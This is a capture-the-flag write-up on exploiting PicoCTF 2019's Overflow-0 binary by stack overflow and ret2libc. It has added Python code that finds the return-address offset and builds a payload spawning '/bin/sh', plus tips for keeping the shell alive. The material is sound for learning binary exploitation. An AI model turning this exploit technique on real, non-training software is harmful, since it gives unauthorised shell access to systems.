Tuesday, 21 July 2020

No eXecution for PicoCTF 2019

Looks like another good day to learn (and practice) more about binary exploitation. :) After bypassing ASLR and NX last time, I decided to check it 'somewhere online'. That's how I found one of the challenges available in PicoCTF 2019. Below you'll find the details. Here we go...

Today we'll start here:


As you can see, I downloaded the Overflow-0 binary to my Ubuntu (16.04 x32) with gdb-peda installed (but you can use GEF instead - your choice). Next - as there was a source file - I read the source:


ASLR is disabled this time ;)


I continued by creating the pattern (using gdb-peda), like this:


The next thing was to check it against our vulnerable program:


Quick results below:


Checking the offset and verifying overflow:


When the second pattern is prepared, we should be somewhere here:
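The pattern/offset round trip shown in the screenshots above, as an added example that is not part of the original post and not gdb-peda's own code: a from-scratch reimplementation of what peda's pattern_create and pattern_offset do, plus a constructed model of the vulnerable stack frame (buffer, saved EBP, saved EIP) so the whole procedure runs offline. The buffer size of 64 passed at the bottom is an assumption; on the real target it comes from the challenge source.

```python
import string
import struct

# Added example, not the post's gdb-peda session. The frame model below is a
# constructed stand-in for the Overflow-0 binary.


def pattern_create(length: int) -> str:
    """Metasploit/peda-style cyclic pattern: Aa0Aa1Aa2...Ab0Ab1...

    Every 4-byte window is unique for the first 20280 characters, so the four
    bytes that end up in EIP identify exactly where in the input they came from.
    """
    triples = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                triples.append(upper + lower + digit)
                if 3 * len(triples) >= length:
                    return "".join(triples)[:length]
    raise ValueError("requested length exceeds the unique pattern space")


def pattern_offset(pattern: str, eip: int) -> int:
    """Turn the crashed EIP (as gdb prints it, e.g. 0x41346341) back into an
    input offset. The CPU popped the bytes little-endian, so repack them the
    same way to recover the substring that was sitting at saved EIP."""
    needle = struct.pack("<I", eip).decode("ascii", errors="replace")
    return pattern.find(needle)  # -1: EIP did not come from our pattern


def simulate_overflow(data: bytes, buf_size: int):
    """Constructed model of a 32-bit frame filled by gets()/strcpy():
    [buf_size bytes of local buffer][4 bytes saved EBP][4 bytes saved EIP].
    Returns the value 'ret' would pop into EIP, or None if the input is too
    short to reach it."""
    eip_offset = buf_size + 4
    if len(data) < eip_offset + 4:
        return None
    return struct.unpack("<I", data[eip_offset:eip_offset + 4])[0]


def find_offset(buf_size: int, pattern_len: int = 200) -> int:
    """The whole procedure from the post: send a pattern, read EIP, look it up."""
    pattern = pattern_create(pattern_len)
    eip = simulate_overflow(pattern.encode(), buf_size)
    if eip is None:
        raise RuntimeError("pattern too short to reach saved EIP; send a longer one")
    return pattern_offset(pattern, eip)


if __name__ == "__main__":
    # Assumed buffer size; expect offset == buf_size + 4 because the saved EBP
    # sits between the buffer and the saved return address.
    print("EIP offset:", find_offset(64))
```

If pattern_offset returns -1, EIP was not overwritten by your bytes (the pattern was too short, or the crash came from somewhere else, e.g. a bad pointer dereference before the function returned); send a longer pattern rather than guessing.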


Next I started building an exploit. What I was looking for was: the address of the system() function, the address of the exit() function and, of course, the address of a "/bin/sh" string. Checking:


The new payload is prepared, so let's try it:
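The ret2libc payload the post builds from those three addresses, as an added example that is not the post's own exploit: it lays out the frame the way system() expects to find it after the overwritten return address is popped, and checks the result before anything is sent at the target. The offset and all addresses are placeholder assumptions; on the real box they come from gdb (p system, p exit, and searching libc for "/bin/sh") with ASLR disabled.

```python
import struct

# Added example, not the post's exploit. Every value below is a placeholder
# assumption; read the real ones out of gdb on the target.
OFFSET = 68                # assumed distance from buffer start to saved EIP
SYSTEM_ADDR = 0xF7E3CDA0   # placeholder for &system
EXIT_ADDR = 0xF7E30890     # placeholder for &exit
BINSH_ADDR = 0xF7F5D0CF    # placeholder for a "/bin/sh" string inside libc


def p32(value: int) -> bytes:
    """Pack a 32-bit address little-endian, as x86 stores it in memory."""
    return struct.pack("<I", value)


def build_ret2libc(offset: int, system_addr: int, exit_addr: int, binsh_addr: int) -> bytes:
    """Overwrite saved EIP so that 'ret' lands in system().

    From system()'s point of view the stack then looks like a normal call:
      [esp]   -> return address (exit(), so the process ends cleanly when the
                 shell closes instead of crashing on a garbage address)
      [esp+4] -> first argument (pointer to "/bin/sh")
    Nothing on the stack is executed, which is why NX does not get in the way.
    """
    return b"A" * offset + p32(system_addr) + p32(exit_addr) + p32(binsh_addr)


def check_layout(payload: bytes, offset: int) -> dict:
    """Decode the payload the way the CPU will consume it."""
    ret, fake_ret, arg = struct.unpack("<III", payload[offset:offset + 12])
    return {"eip": ret, "system_return": fake_ret, "system_arg": arg}


def bad_bytes(payload: bytes) -> set:
    """Bytes that commonly truncate the copy: NUL for strcpy()-style reads,
    newline for gets()/fgets()-style reads. Any hit means the address will
    not arrive intact and a different address (or read primitive) is needed."""
    return {b for b in (0x00, 0x0A) if b in payload}


if __name__ == "__main__":
    payload = build_ret2libc(OFFSET, SYSTEM_ADDR, EXIT_ADDR, BINSH_ADDR)
    assert not bad_bytes(payload), "address contains a byte the read will truncate on"
    with open("payload", "wb") as f:
        f.write(payload)
    print({k: hex(v) for k, v in check_layout(payload, OFFSET).items()})
```

Run it as `(cat payload; cat) | ./vuln` rather than `./vuln < payload`: the second `cat` keeps stdin open, otherwise the spawned shell reads EOF and exits immediately and it looks like the exploit failed. With ASLR off the libc addresses are the same inside and outside gdb; only stack addresses shift with the environment, which is why pointing at "/bin/sh" inside libc is more reliable than placing the string in the buffer yourself.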


Looks like it's done ;] Maybe you'll find it useful.



Special thanks goes to my Patreon: Daniel.
You are AWESOME! ;)

See you next time!







